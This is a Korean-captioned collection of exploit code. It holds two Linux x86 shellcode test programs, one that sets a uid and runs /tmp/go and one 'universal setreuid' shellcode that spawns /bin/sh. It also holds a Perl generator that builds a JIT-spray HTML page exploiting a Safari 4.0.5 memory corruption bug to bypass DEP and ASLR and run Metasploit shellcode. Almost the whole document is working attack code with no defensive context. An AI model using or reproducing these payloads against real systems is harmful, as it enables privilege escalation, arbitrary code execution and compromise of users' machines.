uid, gid 설정 및 실행 파일 설정
char shellcode[] =
"\x31\xc0\xb0\x46\x66\xbb\x66\x02\x66\xb9\x66\x02\xcd\x80" // uid 614
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/go"; // /tmp/go 실행
int main()
{
printf("Length: %d bytes.\n'", strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
Universal setreuid() shellcode (출처 : http://hkpco.kr/paper/universal%20setreuid%20shellcode.txt)
char shellcode[] =
"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80" // setreuid( geteuid() , geteuid() );
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"; // shellcode
int main()
{
printf("Length: %d bytes.\n'", strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
Script JIT shellcode generator for DEP and ASLR bypass (출처 : http://shell-storm.org/shellcode/files/shellcode-686.php)
#!/usr/bin/perl
#
# Script JIT shellcode generator
# for DEP and ASLR bypass
# tested on Safari (ver. 4 and 5)
# By Alexey Sintsov (dookie at inbox.ru / a.sintsov at dsec.ru)
# from Digital Security
# [www.dsecrg.com]
#
# Details: http://dsecrg.com/pages/pub/show.php?id=26
# P.S. here is 0x1000 as mul. factor: (0x0000XXYY*0x00010000=0xXXYY0000)
# this much better for automatic generation than mul. of sqrt of 0xXXYY0000 8)
#
#
# Safari 4.0.5 Memory corruption exploit
# Orig exploit by Krystian Kloskowski
# (used for demo)
#
#
# Special for www.xakep.ru
#
# Usage:perl safari_jit.pl > exploit.html
#
#
#
#Shellcode from Metasploit - Exec CALC
$shellcode =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
"\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00\x00\x00\x50\x68" .
"\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95" .
"\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" .
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5calc\x00";
#Address with RWX - place for shellcode
$addr="\x08\x0A"; #0x080A0000
#################################################################
######## BEGIN ###########
#################################################################
$len=length($shellcode);
$add=$len % 4;
$copyJit="";
for($i=0;$i<$add;$i++)
{
$shellcode.="\xCC";
}
$offsetJit="\"0x22222222^\"+/* START OF OFFSET */\n".
"\"0x22222222^\"+\n".
"\"0x22222222^\"+\n".
"\"0x22222222^\"+\n".
"\"0x22222222^\"+\n".
"\"0x22222222^\"+\n".
"\"0x22222222^\"+\n".
"\"0x22222222^\"+\n".
"\"0x22222222^\"+ /*SHELLCODE BEGINS*/\n";
# Init JIT shelcode
$initJit="\"0x14EBC031^\"+//XOR EAX,EAX\n".
"\"0x14EB01B4^\"+\n".
"\"0x14EB00B0^\"+\n".
"\"0x14EBE0F7^\"+// EAX=0x100*0x100\n".
"\"0x14EBF08B^\"+// MOV ESI, EAX ;ESI=00010000 - MUL factor\n".
"\"0x14EBC031^\"+ //XOR EAX,EAX\n".
sprintf("\"0x14EB%02lxB4^\"+\n",ord substr($addr,0,1)).
sprintf("\"0x14EB%02lxB0^\"+\n",ord substr($addr,1,1)).
"\"0x14EBE6F7^\"+ // MUL ESI; EAX - RWX memory for shellcode\n".
"\"0x14EBC88B^\"+ // mov ecx, eax ; ECX - pointer on RWE mem\n".
"\"0x14EBDB33^\"+ // xor ebx, ebx\n".
"\"0x14EB04B3^\"+ // mov bl, 4 ; EBX = 0x4 - step \n";
#Convert shellcode into JIT code
for($i=0;$i<length($shellcode);$i+=4)
{
my $val="";
$byte1=substr($shellcode,($i+3),1);
$byte2=substr($shellcode,($i+2),1);
$byte3=substr($shellcode,($i+1),1);
$byte4=substr($shellcode,($i),1);
$val.="\"0x14EBC031^\"+ //XOR EAX,EAX\n";
$val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte1);
$val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte2);
$val.= "\"0x14EBE6F7^\"+ //MUL ESI\n";
$val.= sprintf("\"0x14EB%02lxB4^\"+ //MOV AH\n",ord $byte3);
$val.= sprintf("\"0x14EB%02lxB0^\"+ //MOV AL\n",ord $byte4);
$val.="\"0x14EB0189^\"+ // mov [ecx], eax ; copy part of shellcode to RWX page\n".
"\"0x14EBCB03^\"+ // add ecx, ebx ; ecx=ecx+4 - move pointer for next copy\n";
$copyJit.=$val;
}
$jumJit="\"0x14EB00B5^\"+ // mov ch, 00\n".
"\"0x14EB00B1^\"+ // mov cl, 00 ; ECX - RWE memory WITH shellcode\n".
"\"0x14EBE1FF^\"+ // JMP ECX ; PROFIT! \n";
$page="
<!--
JIT-SPRAY
for
Safari 4.0.5 - 5.0.0
(vuln for 4.0.5 only)
JavaScript JIT SHELLCODE and spray
for
ASLR / DEP bypass (Win x32)
By Alexey Sintsov
from Digital Security research Group
special for www.xakep.ru
[DSecRG]
www.dsecrg.com
-->
<script>
function make_buf(payload, len) {
while(payload.length < (len * 4)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function fff()
{
var a = parent;
var buf = make_buf(unescape('%u0104%u0606'), 68000);
a.prompt(alert);
a.prompt(buf);
a.close();
a.prompt(alert);
}
var SPRAY=\"\";
var JIT=\"{ \"+
\"var y=(\"+
";
$endPage="\"0x14ebcccc\"+
\");\"+
\"return y; }\";
var zl=\"zlo_\";
for (var i=1;i<800;i++)
{
SPRAY+=\"function \"+zl+i+\"()\"+JIT+\" \"+zl+i+\"();\";
}
eval(SPRAY);
fff();
</script>
</center>";
#build page
$page.=$offsetJit.$initJit.$copyJit.$jumJit.$endPage;
print $page;
